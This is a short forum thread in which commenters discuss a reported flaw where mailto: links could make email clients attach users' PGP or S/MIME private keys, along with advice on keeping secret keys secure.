Hi @Leo, I know you are a PGP user for email signing and encryption, so this is probably of interest to you:
Several email clients were found to be vulnerable to sending the GPG or S/MIME private keys by the user clicking on a mailto: link on a website!
I never knew you could include an attachment in a “mailto” link. That’s pretty neat.
I can’t think of a situation where this would be useful on a web site except as an attack… you’re unlikely to know the path of average user files on a system since people aren’t robots… thus it would only work for “static” files, like logs and config files… the kind of files likely to have security implications.
Exactly that use case, a scenario where you need a user to send logs in order to provide technical support.
A reasonable application is built by people who know they will need to support it, and have built in a means. My router has this option build in, it has a feedback page where it will extract and zip the log files and other pertinent information and send it appropriately, attaching a prompted support ID if needed.
If someone is adhockingly (my new made up word of the day) assuming the install location (remember some people install files to non-standard locations) and assuming the location of log files, the company producing the software needs a lot more support than the user will ever succeed in requesting. (IMHO)
It’s why I don’t keep my secret key in an available directory. It’s also why I secure it with a strong password. Every worthwhile GnuPG how-to mentions these measures. Many say not to put your secret key on any device. Keep it in a safe. Or Yubikey.
having done a tour of end-user support for a few years, there’s nothing reasonable about the applications they use or the way they work.